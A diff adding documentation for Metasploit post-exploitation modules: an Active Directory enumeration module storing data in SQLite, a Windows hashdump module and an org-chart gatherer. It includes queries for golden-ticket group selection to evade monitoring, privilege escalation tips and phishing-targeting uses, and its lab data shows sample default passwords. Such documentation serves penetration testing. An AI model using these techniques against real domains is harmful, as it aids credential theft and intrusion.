perform queries against the SQLite database. + +## SQLite Database + +**Construction** + +The following tables will be present in the local SQLite database. The ad_* tables use the RID of +the user, computer or group as the primary key, and the view_mapping table effectively joins the +ad_mapping table with ad_users.* and ad_groups.* by RID. + +Note that the purpose of the less obvious flags is documented in the source code, along with +references to MSDN and Technet where appropriate, so this can be easily looked up during an +engagement without needing to refer to this page. + +Table Name | Purpose +------------ | -------- +ad_computers | Information on each of the domain joined computers. +ad_users | Information on each of the domain users. +ad_groups | Information on each of the active directory groups. +ad_mapping | Links the users table to the groups table (i.e. can be used to show which users are effectively members of which groups). +view_mapping | Joins the ad_mapping table to the ad_users and ad_groups table, provided for convenience. This will be the table that most queries will be run against. + +Within each table, the naming convention for the columns is to prefix anything in the +ad_computers table with c_, anything in the ad_users table with u_ and anything in the +ad_groups table with g_. This convention makes the joins between tables much more intuitive. + +**ad_computers** + +The table below shows the columns in the ad_computers table. The fields in capitals at the end +(c_ADS_* and c_SAM_*) are expanded from the userAccountControl and sAMAccountType attributes to +provide an easy way to perform the queries against individual flags. + +Column Name | Type | Purpose +------------------------------------------------ | ------- | -------- +c_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits). +c_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx). +c_cn | TEXT | The name that represents an object. Used to perform searches. +c_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency. +c_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system. +c_dNSHostName | TEXT | The name of computer, as registered in DNS. +c_displayName | TEXT | The display name for an object. This is usually the combination of the users first name, middle initial, and last name. +c_logonCount | INTEGER | The number of times the account has successfully logged on. A value of 0 indicates that the value is unknown. +c_userAccountControl | INTEGER | Flags that control the behavior of the user account. See [Use-Account-Control attribute](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832%28v=vs.85%29.aspx) for a description, but they are also parsed and stored in the c_ADS_UF_* columns below. +c_primaryGroupID | INTEGER | Contains the relative identifier (RID) for the primary group of the user. By default, this is the RID for the Domain Users group. +c_badPwdCount | INTEGER | The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. +c_description | TEXT | Contains the description to display for an object. +c_comment | TEXT | The user's comment. This string can be a null string. Sometimes passwords or sensitive information can be stored here. +c_operatingSystem | TEXT | The Operating System name, for example, Windows Vista Enterprise. +c_operatingSystemServicePack | TEXT | The operating system service pack ID string (for example, SP3). +c_operatingSystemVersion | TEXT | The operating system version string, for example, 4.0. +c_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog. +c_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog. +c_ADS_UF_SCRIPT | INTEGER | If 1, the logon script is executed. +c_ADS_UF_ACCOUNTDISABLE | INTEGER | If 1, the user account is disabled. +c_ADS_UF_HOMEDIR_REQUIRED | INTEGER | If 1, the home directory is required. +c_ADS_UF_LOCKOUT | INTEGER | If 1, the account is currently locked out. +c_ADS_UF_PASSWD_NOTREQD | INTEGER | If 1, no password is required. +c_ADS_UF_PASSWD_CANT_CHANGE | INTEGER | If 1, the user cannot change the password. +c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED | INTEGER | If 1, the user can send an encrypted password. +c_ADS_UF_TEMP_DUPLICATE_ACCOUNT | INTEGER | If 1, this is an account for users whose primary account is in another domain. This account provides user access to this domain, but not to any domain that trusts this domain. Also known as a local user account. +c_ADS_UF_NORMAL_ACCOUNT | INTEGER | If 1, this is a default account type that represents a typical user. +c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT | INTEGER | If 1, this is a permit to trust account for a system domain that trusts other domains. +c_ADS_UF_WORKSTATION_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a computer that is a member of this domain. +c_ADS_UF_SERVER_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a system backup domain controller that is a member of this domain. +c_ADS_UF_DONT_EXPIRE_PASSWD | INTEGER | If 1, the password for this account will never expire. +c_ADS_UF_MNS_LOGON_ACCOUNT | INTEGER | If 1, this is an MNS logon account. +c_ADS_UF_SMARTCARD_REQUIRED | INTEGER | If 1, the user must log on using a smart card. +c_ADS_UF_TRUSTED_FOR_DELEGATION | INTEGER | If 1, the service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. Any such service can impersonate a client requesting the service. +c_ADS_UF_NOT_DELEGATED | INTEGER | If 1, the security context of the user will not be delegated to a service even if the service account is set as trusted for Kerberos delegation. +c_ADS_UF_USE_DES_KEY_ONLY | INTEGER | If 1, restrict this principal to use only Data Encryption Standard (DES) encryption types for keys. +c_ADS_UF_DONT_REQUIRE_PREAUTH | INTEGER | If 1, this account does not require Kerberos pre-authentication for logon. +c_ADS_UF_PASSWORD_EXPIRED | INTEGER | If 1, the user password has expired. This flag is created by the system using data from the Pwd-Last-Set attribute and the domain policy. +c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION | INTEGER | If 1, the account is enabled for delegation. This is a security-sensitive setting; accounts with this option enabled should be strictly controlled. This setting enables a service running under the account to assume a client identity and authenticate as that user to other remote servers on the network. +c_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx) attribute. If 1, this flag is set. +c_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute). + +**ad_users** + +The table below shows the columns in the ad_computers table. The fields in capitals at the end +(c_ADS_* and c_SAM_*) are expanded from the userAccountControl and sAMAccountType attributes to +provide an easy way to perform the queries against individual flags. + +Column Name | Type | Purpose +------------------------------------------------| ------- | ------- +u_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits). +u_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx). +u_cn | TEXT | The name that represents an object. Used to perform searches. +u_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency. +u_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system. +u_dNSHostName | TEXT | The name of computer, as registered in DNS. +u_displayName | TEXT | The display name for an object. This is usually the combination of the users first name, middle initial, and last name. +u_logonCount | INTEGER | The number of times the account has successfully logged on. A value of 0 indicates that the value is unknown. +u_userPrincipalName | TEXT | Technically, this is an Internet-style login name for a user based on the Internet standard RFC 822. By convention and in practice, it is the user's e-mail address. +u_displayName | TEXT | N/A +u_adminCount | INTEGER | Indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively). +u_userAccountControl | INTEGER | Flags that control the behavior of the user account. See [User-Account-Control](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832%28v=vs.85%29.aspx) for a description, but they are also parsed and stored in the c_ADS_UF_* columns below. +u_primaryGroupID | INTEGER | Contains the relative identifier (RID) for the primary group of the user. By default, this is the RID for the Domain Users group. +u_badPwdCount | INTEGER | The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. +u_description | TEXT | Contains the description to display for an object. +u_title | TEXT | Contains the user's job title. This property is commonly used to indicate the formal job title, such as Senior Programmer, rather than occupational class. +u_manager | TEXT | The distinguished name of this user's manager. +u_comment | TEXT | The user's comment. This string can be a null string. Sometimes passwords or sensitive information can be stored here. +u_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog. +u_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog. +u_ADS_UF_SCRIPT | INTEGER | If 1, the logon script is executed. +u_ADS_UF_ACCOUNTDISABLE | INTEGER | If 1, the user account is disabled. +u_ADS_UF_HOMEDIR_REQUIRED | INTEGER | If 1, the home directory is required. +u_ADS_UF_LOCKOUT | INTEGER | If 1, the account is currently locked out. +u_ADS_UF_PASSWD_NOTREQD | INTEGER | If 1, no password is required. +u_ADS_UF_PASSWD_CANT_CHANGE | INTEGER | If 1, the user cannot change the password. +u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED | INTEGER | If 1, the user can send an encrypted password. +u_ADS_UF_TEMP_DUPLICATE_ACCOUNT | INTEGER | If 1, this is an account for users whose primary account is in another domain. This account provides user access to this domain, but not to any domain that trusts this domain. Also known as a local user account. +u_ADS_UF_NORMAL_ACCOUNT | INTEGER | If 1, this is a default account type that represents a typical user. +u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT | INTEGER | If 1, this is a permit to trust account for a system domain that trusts other domains. +u_ADS_UF_WORKSTATION_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a computer that is a member of this domain. +u_ADS_UF_SERVER_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a system backup domain controller that is a member of this domain. +u_ADS_UF_DONT_EXPIRE_PASSWD | INTEGER | If 1, the password for this account will never expire. +u_ADS_UF_MNS_LOGON_ACCOUNT | INTEGER | If 1, this is an MNS logon account. +u_ADS_UF_SMARTCARD_REQUIRED | INTEGER | If 1, the user must log on using a smart card. +u_ADS_UF_TRUSTED_FOR_DELEGATION | INTEGER | If 1, the service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. Any such service can impersonate a client requesting the service. +u_ADS_UF_NOT_DELEGATED | INTEGER | If 1, the security context of the user will not be delegated to a service even if the service account is set as trusted for Kerberos delegation. +u_ADS_UF_USE_DES_KEY_ONLY | INTEGER | If 1, restrict this principal to use only Data Encryption Standard (DES) encryption types for keys. +u_ADS_UF_DONT_REQUIRE_PREAUTH | INTEGER | If 1, this account does not require Kerberos pre-authentication for logon. +u_ADS_UF_PASSWORD_EXPIRED | INTEGER | If 1, the user password has expired. This flag is created by the system using data from the Pwd-Last-Set attribute and the domain policy. +u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION | INTEGER | If 1, the account is enabled for delegation. This is a security-sensitive setting; accounts with this option enabled should be strictly controlled. This setting enables a service running under the account to assume a client identity and authenticate as that user to other remote servers on the network. +u_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx). If 1, this flag is set. +u_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute). + +**ad_groups** + +The table below shows the columns in the ad_groups table. + +Column Name | Type | Purpose +--------------------------------| ------- | ------- +g_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits). +g_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx). +g_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency. +g_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system. +g_adminCount | INTEGER | Indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively). +g_description | TEXT | Contains the description to display for an object. +g_comment | TEXT | The user's comment. This string can be a null string. Sometimes passwords or sensitive information can be stored here. +g_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog. +g_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog. +g_managedby | TEXT | The manager of this group. +g_cn | TEXT | The common name of the group. +g_groupType | INTEGER | Contains a set of flags that define the type and scope of a group object. These are expanded in the g_GT_* fields below. +g_GT_GROUP_CREATED_BY_SYSTEM | INTEGER | If 1, this is a group that is created by the system. +g_GT_GROUP_SCOPE_GLOBAL | INTEGER | If 1, this is a group with global scope. +g_GT_GROUP_SCOPE_LOCAL | INTEGER | If 1, this is a group with domain local scope. +g_GT_GROUP_SCOPE_UNIVERSAL | INTEGER | If 1, this is a group with universal scope. +g_GT_GROUP_SAM_APP_BASIC | INTEGER | If 1, this specifies an APP_BASIC group for Windows Server Authorisation Manager. +g_GT_GROUP_SAM_APP_QUERY | INTEGER | If 1, this specifies an APP_QUERY group for Windows Server Authorisation Manager. +g_GT_GROUP_SECURITY | INTEGER | If 1, this specifies a security group. +g_GT_GROUP_DISTRIBUTION | INTEGER | If 1, this specifies a distribution group (this is the inverse of g_GT_GROUP_SECURITY). I have included it so that distribution groups can be identified more easily (query readability). +g_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx). If 1, this flag is set. +g_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute). + +**ad_mapping** + +The table below shows the columns in the ad_mapping table. This is used to link users to groups. + +Column Name | Type | Purpose +------------| ------- | ------- +user_rid | INTEGER | The RID of a user +group_rid | INTEGER | The RID of a group + +For example, if a particular record had a user_rid of 1000 and a group_rid of 1001, this would +imply that the user whose RID is 1000 is a member of the group whose RID is 1001. Use the +view_mapping view in order to do any meaningful queries, but its content is derived from this one. + +**view_mapping** + +This table is a combination of ad_groups.* and ad_users.*. Therefore, the fields are the +combination of the u_* and the g_* fields shown above. + +## Database Structure + +There are a few design choices that I have deliberately made which I have given an explanation for +below. This is because the reasons for them may not be obvious. + +The users, groups and computers are based on the same class, so the "proper" way to do this would +be to place them all into one table and then restrict results based on sAMAccountType to determine +what type of object it is. In addition, the userAccountControl and sAMAccountType and groupType +attributes have been split out into individual columns which is, from a technical point of view, +unnecessary duplication. + +The reason for this is ease of use; we are much more intuitively familiar with users, groups and +computers being different objects (even if they are all really the same thing), and it is much +easier to understand and formulate a query such as: + +``` +SELECT u_sAMAccountName from ad_users where u_ADS_UF_LOCKOUT = 0 and u_SAM_NORMAL_USER_ACCOUNT = 1 +``` + +than: + +``` +SELECT u_sAMAccountName from ad_users where ((u_userAccountControl&0x00000010) = 0) and ((u_sAMAccountType&0x30000000) > 0) +``` + +This is also true of the sAMAccountType value; this is a code which has a 1:1 mapping with MSDN +constants (i.e. they are not flags) and it would be more efficient to implement a simple lookup table. +However, for consistency, I have implemented the columns for the possible values in the same way as +the attributes which comprise multiple values in the form of flags. + +This database is designed for quick-and-dirty queries, not to be an efficient AD database, and the +benefits of the ease of access significantly outweighs the slight performance impact. + +## Conversion to Unicode + +All of the strings injected into the database have been converted to UTF-8 (encode('UTF-8')) which, +at first glance, does not seem necessary. The reason is documented [here](https://github.com/rails/rails/issues/1965); +namely that SQLite stores Unicode strings as 'text' but non-converted strings as 'blobs' regardless +of the type affinity. Omitting the unicode conversion meant that most of the text queries did not +work properly because the database was treating the text fields as raw binary data. + +## Multi valued attributes + +With the exception of the memberOf attribute, it is assumed that other attributes are single +valued, which may result in a small about of information being missed. For example, the +description attribute can (in some circumstances) be multi-valued but the ADSI queries will only +return the first value. + +This will not make any practical difference for the vast majority of enterprise domains. + +## Database Queries + +Sqlite3 supports a number of output formats (use .mode for all options). These can be used to +easily present the searched data. + +For example, line mode is useful to see all fields in an easy to view form. The example query +searches for all information about the user whose username is 'unprivileged.user' + +``` +sqlite> .mode line +sqlite> select * from ad_users where u_sAMAccountName = "unprivileged.user"; + u_rid = 1127 + u_distinguishedName = CN=Unprivileged User,CN=Users,DC=goat,DC=stu + u_description = Do not delete. Default pass set to password123 + u_displayName = Unprivileged User + u_sAMAccountType = 805306368 + u_sAMAccountName = unprivileged.user + u_logonCount = 1 + u_userAccountControl = 512 + u_primaryGroupID = 513 + u_cn = Unprivileged User + u_adminCount = 1 + u_badPwdCount = 0 + u_userPrincipalName = unprivileged.user@goat.stu + u_comment = + u_title = + u_manager = CN=Stuart Morgan - User,CN=Users,DC=goat,DC=stu + u_whenCreated = 2015-12-20 20:10:54.000 + u_whenChanged = 2015-12-20 23:12:48.000 + u_ADS_UF_SCRIPT = 0 + u_ADS_UF_ACCOUNTDISABLE = 0 + u_ADS_UF_HOMEDIR_REQUIRED = 0 + u_ADS_UF_LOCKOUT = 0 + u_ADS_UF_PASSWD_NOTREQD = 0 + u_ADS_UF_PASSWD_CANT_CHANGE = 0 + u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 0 + u_ADS_UF_TEMP_DUPLICATE_ACCOUNT = 0 + u_ADS_UF_NORMAL_ACCOUNT = 1 + u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT = 0 + u_ADS_UF_WORKSTATION_TRUST_ACCOUNT = 0 + u_ADS_UF_SERVER_TRUST_ACCOUNT = 0 + u_ADS_UF_DONT_EXPIRE_PASSWD = 0 + u_ADS_UF_MNS_LOGON_ACCOUNT = 0 + u_ADS_UF_SMARTCARD_REQUIRED = 0 + u_ADS_UF_TRUSTED_FOR_DELEGATION = 0 + u_ADS_UF_NOT_DELEGATED = 0 + u_ADS_UF_USE_DES_KEY_ONLY = 0 + u_ADS_UF_DONT_REQUIRE_PREAUTH = 0 + u_ADS_UF_PASSWORD_EXPIRED = 0 +u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0 + u_SAM_DOMAIN_OBJECT = 0 + u_SAM_GROUP_OBJECT = 0 + u_SAM_NON_SECURITY_GROUP_OBJECT = 0 + u_SAM_ALIAS_OBJECT = 0 + u_SAM_NON_SECURITY_ALIAS_OBJECT = 0 + u_SAM_NORMAL_USER_ACCOUNT = 1 + u_SAM_MACHINE_ACCOUNT = 0 + u_SAM_TRUST_ACCOUNT = 0 + u_SAM_APP_BASIC_GROUP = 0 + u_SAM_APP_QUERY_GROUP = 0 + u_SAM_ACCOUNT_TYPE_MAX = 0 +``` + +SQLite can generate output in HTML format with headers. For example, the query below displays the +username, email address and number of times that the user has logged on for all users who have a +manager with the word 'Stuart' somewhere in the DN. + +``` +sqlite> .mode html +sqlite> .headers on +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; +u_sAMAccountName +u_userPrincipalName +u_logonCount + +unprivileged.user +unprivileged.user@goat.stu +1 + +sqlite> +``` + +The same query can be used in INSERT mode, in which the results will be displayed as a series of +SQL insert statements for importing into another database: + +``` +sqlite> .mode insert +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; +INSERT INTO table(u_sAMAccountName,u_userPrincipalName,u_logonCount) VALUES('unprivileged.user','unprivileged.user@goat.stu',1); +``` + +The default mode (list) will display the results with a pipe character separating the fields: + +``` +sqlite> .mode list +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; +u_sAMAccountName u_userPrincipalName u_logonCount +unprivileged.user unprivileged.user@goat.stu 1 +``` + +There are a number of other ways that this information could be presented; please play with SQLite +in order to learn how to use them. + +## Example Queries + +A number of example queries are shown below, in order to give an idea of how easy it is to build up +complex queries. + +Search for all users who have a title, description or comment and display this information along +with their username: + +``` +select u_sAMAccountName,u_title,u_description,u_comment from ad_users where (u_title != "" or u_description != "" or u_comment != ""); +``` + +Display all stored fields for all users whose accounts are not disabled, have a password that does +not expire, have a name starting with 'Frank' and have logged on more than once. + +``` +select * from ad_users where u_ADS_UF_ACCOUNTDISABLE=0 and u_ADS_UF_DONT_EXPIRE_PASSWD=1 and u_cn LIKE 'Frank%' and u_logonCount>1; +``` + +Get the list of group RIDs that have a name which do not have the word 'admin' in them somewhere +(perhaps useful to construct a golden ticket with access to pretty much all groups except anything +with 'admin' in it), might be useful to evade a very basic form of monitoring perhaps? + +``` +select DISTINCT g_rid from ad_groups where g_sAMAccountName NOT LIKE '%admin%'; +``` + +Search for all users who are members of the 'Domain Admins' group and display their username. +Note that this will include those in nested groups. + +``` +select u_sAMAccountName from view_mapping where g_sAMAccountName = 'Domain Admins'; +``` + +Show the groups that the user 'stufus' is a member of and write the output to /tmp/groups.txt +(e.g. for usage in a different tool): + +``` +.once /tmp/groups.txt +select g_sAMAccountName from view_mapping where u_sAMAccountName = 'stufus'; +``` + +Imagine you have compromised passwords or accounts for user1, user2, user3 and user4. Show the AD +groups which, between them all, you have access to. + +``` +select DISTINCT g_sAMAccountName from view_mapping where u_sAMAccountName IN ('user1','user2','user3','user4'); +``` + +Retrieve the list of group names common to both 'user1' and 'user2' and display the group RID, +group name and group description. This could be useful if you were aware that both these users +are in a group that has access to a very specific resource but are in a large number of separate +other groups. + +``` +select v1.g_rid,v1.g_sAMAccountName,v1.g_description FROM view_mapping v1 INNER JOIN view_mapping v2 ON v1.g_rid = v2.g_rid where v1.u_sAMAccountName = 'user1' and v2.u_sAMAccountName = 'user2'; +``` + +Show the name, DNS hostname and OS information for each of the computers in the domain: + +``` +select c_cn,c_dNSHostName,c_operatingSystem,c_operatingSystemVersion,c_operatingSystemServicePack from ad_computers; +``` + +Display the same columns as above but only show machines in the 'Domain Controllers' OU (you can't +normally search by DN because it isn't a "real" attribute when querying through LDAP, but as it is +a normal text field in the database, you can use regular expressions and normal string matching): + +``` +select c_cn,c_dNSHostName,c_operatingSystem,c_operatingSystemVersion,c_operatingSystemServicePack from ad_computers where c_distinguishedName LIKE '%OU=Domain Controllers%'; +``` + +Show all fields for computers that have the c_ADS_UF_WORKSTATION_TRUST_ACCOUNT set to 1 (which +seems to be everything except domain controllers) on my test system: + +``` +select * from ad_computers where c_ADS_UF_WORKSTATION_TRUST_ACCOUNT = 1; +``` + +Show all fields for computers whose operating system is Windows XP, Windows 2000 or Windows 2003 +(note that you need regular expression support in SQLite): + +``` +select * from ad_computers where c_operatingSystem REGEXP '(XP|200[03])'; +``` + +...and if you don't have regular expression support: + +``` +select * from ad_computers where c_operatingSystem LIKE '%XP%' OR c_operatingSystem LIKE '%2000%' OR c_operatingSystem LIKE '%2003%'; +``` + +Search for all members of all groups who are (amongst other things) members of any group managed +by anyone whose CN starts with 'Unprivileged User' and return their username only: + +``` +select DISTINCT u_sAMAccountName from view_mapping where g_rid IN (select g_rid from view_mapping where g_managedBy LIKE 'CN=Unprivileged User%'); +``` + +## Scenarios + +**Group Policy Objects** + +This cannot be used to gain a complete understanding of effective permissions because it does not +analyze group policy objects. For example, a group policy may add inconspicuous groups to +privileged groups and privileged groups, such as Domain Admins, may be removed from local +administrator groups due to GPP. Therefore, this will give a reliable overview of the effective +'static' permissions but cannot be completely relied on for overall effective permissions. + +**Domain Controller interaction** + +The acquisition of domain information does involve repeated queries against the domain controllers. +However, all interaction with AD uses native functionality and has not been noted to cause +performance problems when tested. This was recently tested on a live engagement on a domain that +has just under 11,000 groups and a similar number of users. Admittedly it took about an hour to +pull down everything (as opposed to the 1 minute to replicate the LDAP database) but the final +database size was 19,255,296 bytes, so perfectly manageable. diff --git a/documentation/modules/post/windows/gather/hashdump.md b/documentation/modules/post/windows/gather/hashdump.md new file mode 100644 index 0000000000..7e284e76fa --- /dev/null +++ b/documentation/modules/post/windows/gather/hashdump.md @@ -0,0 +1,46 @@ +The post/gather/hashdump module functions similarly to Meterpreter's built-in hashdump command. + +Having this feature as a post module allows it to be used in different penetration testing scenarios. + + +## Vulnerable Application + +--- + +To be able to use post/gather/hash_dump, you must meet these requirements: + +* You are on a Meterpreter type session. +* The target is a Windows platform. +* It must be executed under the context of a high privilege account, such as SYSTEM. + +## Verification Steps + +--- + +Please see Overview for usage. + +## Scenarios + +--- + +**Upgrading to Meterpreter** + +To be able to use this module, a Meterpreter session is needed. To upgrade to a Meterpreter session, the easiest way is to use the post/multi/manage/shell_to_meterpreter module. Or, you can try: + +1. Use the exploit/multi/script/web_delivery module. +2. Manually generate a Meterpreter executable, upload it, and execute it. + +**High Privilege Account** + +Before using post/gather/hashdump, there is a possibility you need to escalate your privileges. + +There are a few common options to consider: + +* Using a local exploit module. Or use Local Exploit Suggester, which automatically informs you + which exploits might be suitable for the remote target. +* The getsystem command in Meterpreter. +* Stolen passwords. + +**Hashdump From Multiple Sessions** + +One major advantage of having hashdump as a post module is you can run against it multiple hosts easily. To learn how, refer to Overview for usage. diff --git a/documentation/modules/post/windows/gather/make_csv_orgchart.md b/documentation/modules/post/windows/gather/make_csv_orgchart.md new file mode 100644 index 0000000000..bd1882b99a --- /dev/null +++ b/documentation/modules/post/windows/gather/make_csv_orgchart.md @@ -0,0 +1,85 @@ +This module can be used to aid the generation of an organizational chart based on information +contained in Active Directory. The module itself uses ADSI to retrieve key information from AD +(manager, title, description etc) fields and then present it in a CSV file in the form: + +``` +cn,description,title,phone,department,division,e-mail,company,reports_to +``` + +The reports_to field is the only one which is generated; everything else is taken directly from AD. +The 'manager' field contains the DN of the manager assigned to that user, and this module simply +uses a regular expression to obtain the CN field of the manager. + +This can then be imported into tools like [Microsoft Visio](https://products.office.com/en-us/visio/flowchart-software) +(using the organizational chart wizard) and it will construct a visual org chart from the +information there. Although visio supports the ability to generate Org charts if it is on a domain +joined machine, but there does not seem to be a way of doing this remotely (e.g. during a +red teaming exercise). + +This should not be confused with security groups and AD managed groups; this is purely an +internal organizational hierarchy representation but could be very useful for situational awareness +or in order to construct a more plausible or targeted internal phishing exercise. + +# Options + +Option | Value +-------------------| --- +ACTIVE_USERS_ONLY | This will restrict the search for users to those whose accounts are Active. This would have the effect of excluding disabled accounts (e.g. employees who have resigned). +FILTER | Any additional LDAP filtering that is required when searching for users. +WITH_MANAGERS_ONLY | If this is TRUE, the module will only include users who have a manger set (internally, this is implemented by adding (manager=*) to the ADSI query filter). This could be useful if not everyone has a manager set, but could mean that the top executive is not included either. +STORE_LOOT | Store the results in a CSV file in loot. You'll almost certainly want this set to TRUE. + +# Demo + +For the purposes of this contrived example, the module has been configured to generate the CSV +reporting information for everyone with 'IT' somewhere in their common name. + +``` +msf post(make_csv_orgchart) > show options + +Module options (post/windows/gather/make_csv_orgchart): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + ACTIVE_USERS_ONLY true yes Only include active users (i.e. not disabled ones) + DOMAIN no The domain to query or distinguished name (e.g. DC=test,DC=com) + FILTER cn=*IT* no Additional LDAP filter to use when searching for users + MAX_SEARCH 500 yes Maximum values to retrieve, 0 for all. + SESSION 2 yes The session to run this module on. + STORE_LOOT true yes Store the organisational chart information in CSV format in loot + WITH_MANAGERS_ONLY false no Only users with managers + +msf post(make_csv_orgchart) > run + +Users & Managers +================ + + cn description title phone department division e-mail company reports_to + -- ----------- ----- ----- ---------- -------- ------ ------- ---------- + IT Manager Deputy GOAT IT Director it.manager@goat.stu IT Director + IT Director Director of Goat IT it.director@goat.stu + IT Leader: Badger Team Leader of Blue Team Operations it.leader.badger@goat.stu IT Manager + IT Leader: Otter Team Leader: Offensive Operations it.leader.otter@goat.stu IT Manager + Oswold Otter (IT Team) Consultant oswold.otter@goat.stu IT Leader: Otter + Bertie Badger (IT Security Team) Default pass is badger123 IT Security Team Deputy 